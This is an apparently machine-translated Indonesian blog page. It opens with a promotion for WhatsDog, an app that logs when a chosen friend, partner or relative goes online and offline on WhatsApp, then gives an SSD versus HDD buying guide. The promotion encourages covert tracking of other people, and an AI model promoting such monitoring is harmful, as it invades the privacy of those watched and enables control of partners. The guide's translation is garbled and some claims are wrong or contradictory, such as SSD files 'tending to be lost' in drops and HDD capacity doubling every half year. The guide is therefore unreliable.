Anda memilih siapa yang ingin Anda pantau: teman, pasangan, kerabat .. siapa pun. Selain itu, WhatsDog akan menunjukkan kepada Anda daftar koneksi dan jam logout ke WhatsApp dari kontak itu. Anda akan dapat melacak semuanya berkat kalender WhatsDog dan Anda akan memiliki semua data yang dapat dicari (koneksi hari-hari sebelumnya, jumlah dan panjang koneksi ..). Apa lagi yang kamu butuhkan?

catatan:
Ini bukan Aplikasi Android Akun Hacking Whatspp.
Unduh WhatsDog. Pengawas WhatsApp

Sunday, November 3, 2019

Apa Perbedaannya Dan Mana yang Baik !! SSD vs. HDD !!


Apakah kita semua tahu betul bahwa salah satu yang tidak diketahui yang disajikan kepada pengguna ketika dia ingin berkumpul dari awal, atau bahkan pada saat memilih komputer yang sudah terpasang, adalah sistem penyimpanan yang Anda butuhkan: HDD atau SSD? Karenanya, hari ini di artikel ini kami akan menunjukkan kepada Anda perbedaan antara HDD dan SSD dan cara memilih.

SSD vs. HDD: Apa Perbedaannya Dan Cara Memilih

Salah satu yang tidak diketahui yang disajikan kepada pengguna ketika dia ingin berkumpul dari awal, atau bahkan pada saat memilih komputer yang sudah dipasang, adalah sistem penyimpanan yang Anda butuhkan: HDD atau SSD ? Sampai beberapa waktu yang lalu, tidak ada banyak alternatif untuk unit memori untuk komputer, dan untuk alasan ini, sangat perlu untuk menganalisis kemungkinan yang saat ini disajikan kepada kami.

Sekarang kita dihadapkan dengan banyak kombinasi dan opsi penyimpanan: dari laptop dengan solid state drive ( SSD ) ke komputer desktop dengan hard drive standar (HDD), termasuk kombinasi keduanya: SSD digunakan sebagai disk utama di mana sistem operasi akan pergi, dan HDD sebagai disk sekunder untuk yang lainnya.

Bagaimana cara memilih jenis penyimpanan HDD atau SSD? Jenis penyimpanan apa yang paling cocok untuk Anda? Kami akan menyelesaikan keraguan ini dengan menjelaskan perbedaan di antara keduanya dan kami akan memandu Anda untuk membantu Anda memilih di antara keduanya. 


Apa itu hard drive (HDD) dan solid state drive (SSD)?

HDD (Hard Drive Disk) adalah perangkat keras yang digunakan untuk menyimpan data komputer. Hard disk adalah pelat logam yang menggunakan sistem perekaman magnetik untuk menyimpan semua jenis file, dari dokumen Word hingga proyek bernilai jutaan dolar pada kacamata realitas virtual baru.

Dengan menulis ke beberapa disc berputar informasinya direkam dan semakin tipis disc, semakin baik rekamannya. Untuk alasan ini, disk dengan ukuran yang sama dapat memiliki kapasitas penyimpanan yang berbeda. Unit-unit ini telah berevolusi sejak penciptaannya pada tahun 1960, biasanya menggandakan kapasitasnya setiap setengah tahun.

Unit yang biasanya menggunakan HDD atau hard drive adalah komputer desktop atau desktop, laptop, dan server bisnis.

Sementara solid-state drive atau SSD berfungsi sama seperti hard drive dengan perbedaan, file-file tersebut disimpan dalam chip flash yang saling berhubungan satu sama lain. Chip ini dapat dimasukkan dalam motherboard perangkat (seperti pada beberapa laptop kecil), dalam kartu PCIe atau dalam kotak yang mirip dengan hard drive seumur hidup. Salah satu karakteristik dari chip ini adalah mereka dapat menyimpan data bahkan ketika tidak ada energi yang mengalir melalui sistem.

Laptop, tablet, dan telepon pintar adalah perangkat yang paling banyak digunakan, secara default, SSD. Kita tidak boleh lupa bahwa beberapa perangkat seperti kamera foto juga menggunakan jenis penyimpanan ini untuk memberikan waktu respons yang lebih lama dan menyimpan lebih banyak gambar dalam sistem penyimpanan eksternal seperti kartu SD.

Keuntungan dan kerugian dari HDD dan SSD


Sebelum menganalisis perbedaan apa saja antara sistem penyimpanan ini, kami harus membuat basis: HDD dan SDD memiliki fungsi yang sama, simpan file Anda. Ada beberapa karakteristik dan kegunaan yang lebih menguntungkan untuk menggunakan satu atau yang lain, itulah yang akan kami jelaskan sekarang di artikel ini.
 
Harga

Salah satu faktor kunci ketika memilih sistem penyimpanan mana yang akan dipilih adalah anggaran yang kita miliki, setelah semua, uang adalah satu-satunya hal yang akan membatasi pilihan kita.

HDD: Untuk efisiensi dan produktivitas saat membuat hard drive, harganya jauh lebih murah untuk apa yang dapat mereka tawarkan.

SSD: Karena kreasi "awal" dan komponen yang membentuknya, biasanya lebih mahal daripada HDD.

Agar Anda melihatnya dengan cara yang lebih praktis, hard drive 1 TB berharga kurang dari $ 50 dan SSD dengan kapasitas yang sama berharga lebih dari $ 200.
 
Kapasitas

Faktor kedua yang menentukan sistem mana yang harus dipilih adalah seberapa besar kapasitas penyimpanan data yang dapat dicakup oleh perangkat penyimpanan kami. Saat ini arsip semakin besar dan besar, pada saat yang sama diperlukan untuk mengakses file dengan cara yang lebih cepat dan lebih efisien.

HDD: Hari ini kita dapat menemukan hard drive hingga 8 TB, kebrutalan nyata untuk komputer pribadi, bahkan hari ini.

SSD: Untuk saat ini, kami dapat menemukan solid state drive hingga 4TB.

Meskipun tampaknya hard drive menghasilkan lebih dari ini, sekali lagi kita harus melihat harga setiap unit.
 
Kecepatan dan kinerja

Kecepatan mengakses, memindahkan, memodifikasi, dan menghapus file sangat penting untuk penggunaan sehari-hari, baik dari perspektif pengguna dan profesional. Oleh karena itu, itu adalah variabel lain yang perlu dipertimbangkan.

Di sini tidak banyak yang bisa dijelaskan: SSD atau solid state drive lebih unggul dalam kecepatan dan kinerja dibandingkan dengan hard drive, dengan kata dasar komputer yang memiliki SSD hanya akan bekerja lebih cepat.

Komputer yang memiliki sistem operasi yang diinstal pada HDD mungkin membutuhkan waktu lebih lama. Dengan SSD, semuanya pasti akan memiliki kinerja yang lebih besar, jadi jika Anda ingin memiliki komputer yang cepat maka Anda harus memilih SSD tanpa keraguan.
 
Daya tahan

Berapa banyak komputer Anda akan bergerak adalah pertanyaan yang juga harus ditanyakan oleh pengguna. Setiap sistem penyimpanan dibangun secara berbeda dan akan lebih rentan terhadap kerusakan atau kerusakan.

HDD: Hard drive dibuat oleh komponen seluler berbeda yang lebih rentan rusak pada semua jenis gerakan, jadi Anda harus sangat berhati-hati saat mengangkutnya. Selain itu, bagian yang bergerak akhirnya aus.

SSD: Solid state drive tidak memiliki bagian yang bergerak, dan karena itu, file Anda cenderung hilang karena kerusakan pada komponen jika terjadi penurunan. Harus ditekankan bahwa setiap sel bank memori flash unit dapat ditulis dan dihapus beberapa kali, tetapi ada alat yang berbeda untuk memantau dan mengoptimalkan proses itu untuk memperpanjang akhir masa manfaat unit.
 
Fragmentasi

Fragmentasi adalah proses dimana (kata itu sendiri mengatakan) file dipecah dan disebarkan oleh unit penyimpanan. Hanya hard drive yang mengalami fitur ini

HDD: Karena permukaan rekamannya yang berputar, permukaan hard disk bekerja lebih baik dengan file yang lebih besar yang direkam pada blok padat. Ketika blok-blok ini dipenuhi, file-file tersebut cenderung dibagi oleh ruang-ruang bebas HDD, yang mengganggu kecepatan membaca dan menulis data. Meskipun benar bahwa membaca dan menulis file telah meningkat dan karena itu efeknya telah diminimalkan, dan hard drive masih rentan terhadap fragmen.

SSD: Karena konstruksinya, unit solid state tidak memiliki masalah itu, karena tidak ada lokasi fisik file di unit dan tidak ada kepala pembacaan fisik. Karena alasan ini, SSD jauh lebih cepat daripada HDD.
 
Ukuran unit

Faktor lain yang perlu dipertimbangkan ketika memilih sistem penyimpanan adalah ukuran unit itu sendiri. Ada beberapa batasan fisik yang jelas tergantung pada perangkat yang akan kita pilih atau pasang.

HDD: Hard drive tergantung pada pelat yang berputar, dan karenanya, membatasi ukuran unit. Di satu sisi, kami memiliki komputer desktop dan laptop yang berorientasi pada ukuran: 1,8-inci, 2,5-inci, dan 3,5-inci di sisi lain, kami memiliki yang digunakan untuk unit yang lebih kecil seperti ponsel cerdas dan sejenisnya tetapi tidak umum. Produsen utama hard drive menghentikan pengembangan produk baru di bawah 1,8 inci karena jatuhnya harga SSD.

SSD: Mereka tidak memiliki batasan fisik yang mencegah mereka untuk terus tumbuh lebih kecil sehingga mereka akan terus mengembangkan unit yang lebih kecil dari waktu ke waktu. Ada SSD dengan berbagai ukuran yang beradaptasi dengan perangkat di mana mereka akan dipasang.
 
Kebisingan
Kebisingan, meskipun tampaknya agak tidak signifikan ketika menggunakan komputer, adalah sesuatu yang tergantung pada penggunaan dan jam harian yang akan digunakan dapat membuat perbedaan antara memilih sistem penyimpanan atau yang lain. Produser musik yang tidak memiliki alat untuk merekam di ruangan di luar komputer membutuhkan perangkat setenang mungkin sehingga tidak merusak suara.

HDD: Bahkan hard disk yang paling sunyi akan memancarkan beberapa jenis suara saat komputer beroperasi, ada banyak bagian pada disk yang dapat mengeluarkan suara. Jenis kebisingan ini dapat diperburuk jika sistem telah mengalami beberapa jenis kerusakan, telah dipasang secara tidak benar atau beberapa bagian dari disk sudah aus. Hard drive tercepat akan mengeluarkan lebih banyak noise.

SSD: SSD, yang tidak memiliki komponen mekanis, karenanya, tidak membuat suara apa pun.
 
Kesimpulan, HDD atau SSD?

Pada titik ini, Anda harus dapat mengetahui sistem penyimpanan apa yang harus Anda gunakan, tetapi bagi mereka yang masih memiliki beberapa pertanyaan, kami membuat ringkasan singkat menyesuaikan kebutuhan di profil yang berbeda.
 
Beli hard drive HDD jika!
Anda akan tertarik untuk mendapatkan hard drive jika Anda berada di antara pengguna ini: -

Anggaran ketat: Hard drive lebih murah daripada SSD. Bagi mereka yang harus mengorbankan ruang atau kecepatan karena kekurangan uang, hard drive adalah pilihan terbaik.

Pengguna biasa: Pengguna yang menggunakan komputernya untuk tugas-tugas paling dasar seperti otomatisasi kantor, menjelajah internet, mendengarkan musik yang disimpan secara lokal di komputer, dll. Akan lebih mudah untuk memiliki HDD karena Anda dapat mengalokasikan uang itu untuk memperoleh manfaat lainnya.

Server unduhan multimedia: Hard drive memiliki kapasitas yang jauh lebih tinggi daripada SSD dan merupakan pilihan yang jelas jika Anda menginginkan lebih banyak ruang.
 
Beli solid state disk atau SDD jika!

Anda akan tertarik untuk memperoleh unit negara solid jika Anda berada di antara kelompok-kelompok ini: -

Insinyur audio dan produser musik: Seperti yang telah kami katakan sebelumnya, semakin sedikit kebisingan yang mencemari kamar, semakin baik. Oleh karena itu, menggunakan SSD adalah opsi yang sesuai.

Pengembara: Jika Anda adalah seseorang yang menggunakan laptop atau cenderung untuk memindahkan perangkat Anda, Anda akan memerlukan SSD. Karena kami tidak ingin file hilang pada benjolan pertama.

Anda memerlukan komputer yang cepat: SSD memiliki kinerja dan kecepatan yang lebih baik daripada hard drive, sehingga Anda menginginkannya. Apa yang Anda pikirkan tentang ini? Cukup bagikan semua pandangan dan pemikiran Anda di bagian komentar di bawah ini.